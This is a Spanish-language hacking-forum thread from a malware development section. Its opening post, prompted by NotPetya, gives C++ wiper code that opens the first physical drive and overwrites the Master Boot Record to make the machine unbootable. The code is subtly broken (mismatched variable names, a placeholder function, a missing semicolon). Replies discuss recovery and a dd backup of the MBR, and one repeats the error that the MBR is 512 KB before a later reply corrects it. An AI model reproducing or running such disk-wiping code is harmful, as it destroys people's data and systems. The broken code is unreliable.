Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

[In]Seguridad Informática => Análisis y desarrollo de malwares => Desarrollo y modificación de malwares => Mensaje iniciado por: sadfud en Julio 06, 2017, 02:42:53 PM

Título: Reescribiendo el Boot Master Record
Publicado por: sadfud en Julio 06, 2017, 02:42:53 PM
(http://i.imgur.com/KvQSfm4.jpg)
Buenas underc0deanos,

Supongo que todo el mundo ha visto las noticias de NotPetya, y si alguno ha leído los análisis técnicos sabrá que era un wiper y no un ransomware, debido a que reescribe el sector de arranque del disco duro dejando el pc inservible una vez se haya reiniciado/apagado.

A continuación dejo un código que tenia guardado sobre como hacer esto.

Espero que sea útil para poder estudiarlo.

Código (cpp) [Seleccionar]
/*
  Rewrite boot master record code sample
  Credits to 0memory
*/
#include <windows.h>
#include <iostream>

using namespace std;

#define MBR_SIZE 512
int main(int argc, char const *argv[]) {
  DWORD write;
  char mbrdata[MBR_SIZE];
  Underc0de(&mbrData, (sizeof mbrdata));

  HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL)
  if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE){
    cout << "MBR overwritten" << endl;
    Sleep(5000);
    Exitprocess(0);
  } else {
    cout << "MBR not overwritten" << endl;
    Sleep(5000);
    Exitprocess(0);
  }
  CloseHandle(MasterBootRecord);
  return 0;
}

Un saludo
Título: Re:Reescribiendo el Boot Master Record
Publicado por: RuidosoBSD en Julio 06, 2017, 06:19:07 PM
Gracias por el aporte. Puede resolverse con un disco de recuperacion ¿no?
Título: Re:Reescribiendo el Boot Master Record
Publicado por: PikachuDorado en Julio 12, 2017, 07:44:18 AM
Estas cada dia mas violento @sadfud (https://underc0de.org/foro/index.php?action=profile;u=57398) sos un crack! ♥
Título: Re:Reescribiendo el Boot Master Record
Publicado por: animanegra en Julio 12, 2017, 06:05:57 PM
El MBR son los primero 512 KB del disco duro (recordarme la dimension si estoy confundido), lo mas sencillo es hacer lo que se hacia antes cuando instalar linux y windows era problematico. Haces un:
dd if=/dev/sda of=copiaMBR bs=512 count=1
y asi tienes una copia del MBR por si las moscas. ^^
Para restaurarla poner el if y el of en sentido inverso y listos.

El petya y esos ¿Solo joden el MBR?
Título: Re:Reescribiendo el Boot Master Record
Publicado por: RuidosoBSD en Julio 13, 2017, 05:24:43 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El petya y esos ¿Solo joden el MBR?
No, es una de las características pero no la única
Título: Re:Reescribiendo el Boot Master Record
Publicado por: desmon_hak en Abril 30, 2023, 10:23:41 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginEl MBR son los primero 512 KB del disco duro (recordarme la dimension si estoy confundido), lo mas sencillo es hacer lo que se hacia antes cuando instalar linux y windows era problematico. Haces un:
dd if=/dev/sda of=copiaMBR bs=512 count=1
y asi tienes una copia del MBR por si las moscas. ^^
Para restaurarla poner el if y el of en sentido inverso y listos.

El petya y esos ¿Solo joden el MBR?

Perdona amigo, no son 512kb, son 512bytes, el tamaño de un sector en el dico(comúnmente)
Sólo texto | Texto con Imágenes